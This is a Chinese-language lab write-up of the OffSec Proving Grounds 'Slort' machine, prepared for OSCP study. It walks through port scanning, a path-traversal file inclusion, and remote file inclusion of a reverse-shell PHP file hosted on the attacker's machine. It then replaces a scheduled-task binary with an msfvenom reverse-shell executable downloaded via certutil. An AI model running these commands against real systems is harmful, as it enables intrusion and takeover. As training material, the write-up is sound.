OSCP Slort Write-up

一、靶场详情

靶场名称：

Slort

靶场地址：

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界：

HTTP 服务远程文件包含 –> 系统 rupert 用户权限 –> 用户旗帜

权限提升：

修改 Backup 目录可执行程序 –> 系统 administrator 用户权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描：

sudo nmap -p- 192.168.164.53 --min-rate=2000

PORT      STATE SERVICE
21/tcp    open  ftp
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
4443/tcp  open  pharos
5040/tcp  open  unknown
7680/tcp  open  pando-pub
8080/tcp  open  http-proxy
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

UDP 端口扫描：未发现有价值信息。

TCP 服务信息搜集：

sudo nmap -p21,135,139,445,3306,4443,5040,7680,8080,49664,49665,49666,49667,49668,49669 -sCV 192.168.164.53

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql         MariaDB 10.3.24 or later (unauthorized)
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.164.53:4443/dashboard/
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.164.53:8080/dashboard/
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-09-18T11:35:50
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_clock-skew: -1s

系统为 Windows 环境，开放有 HTTP、FTP、MYSQL 和 Windows 的一些默认服务。

3.2 渗透测试突破边界

3.2.1 远程文件包含漏洞

靶机 SMB、FTP 服务均无法匿名访问，HTTP 4443、8080 均部署了 XAMPP 应用（大概率为同一应用）。

在页面点击链接可跳转至 phpinfo 和 Phpmyadmin 界面，其中 Phpmyadmin 拒绝访问。

目前除了 phpinfo 未发现其余有价值信息，使用 dirsearch 进行目录枚举，发现 site 目录。

dirsearch -u http://192.168.164.53:4443/

访问 site 目录会自动跳转至 index.php?page=main.php 地址，猜测可能存在文件包含漏洞。

靶机为 Windows 操作系统，可尝试包含 C:\Windows\win.ini 文件。

http://192.168.164.53:4443/site/index.php?page=../../../../../windows/win.ini

本地文件包含成功，可尝试执行远程文件包含，创建 php 反弹 shell 文件，然后开启 web 共享，通过靶机 web 执行远程文件包含，得到系统 rupert 用户权限。

reverse shell：

https://www.revshells.com/

goshs -p 80
rlwrap nc -lvnp 8080
http://192.168.164.53:4443/site/index.php?page=http://192.168.45.227/shell.php

3.2.2 用户旗帜获取

3.3 提权获取系统管理员权限

3.3.1 修改计划任务可执行文件提权至系统 administrator

在靶机 C:\Backup 发现多个可疑文件，细心的话还可以发现一些流文件，但并没有包含有价值信息。

dir /r /a

more < backup.txt:Zone.Identifier:$DATA
more < info.txt:Zone.Identifier:$DATA

info.txt 文件泄露系统会每个五分钟执行一次 TFTP.EXE 程序，尝试替换该程序为反弹 shell。

使用 msfvenom 生成 exe 格式的反弹 shell。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.227 LPORT=8080 -f exe -o TFTP.EXE

提前在 kali 使用 msf handle 模块监听本机 8080 端口。

将反弹 shell 文件上传至靶机 backup 目录，等待靶机执行计划任务时，可得到系统 administrator 用户 shell。

cd /Bakcup
certutil -urlcache -split -f http://192.168.45.227/TFTP.EXE

3.3.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流，欢迎点击「关于我」，通过页面中的微信公众号、邮箱或 Discord 与我联系；若您发现文章中存在任何错误或不足之处，也非常欢迎通过以上方式指出，在此一并致以衷心的感谢。 😊🫡

最后，祝您生活愉快！🌞✨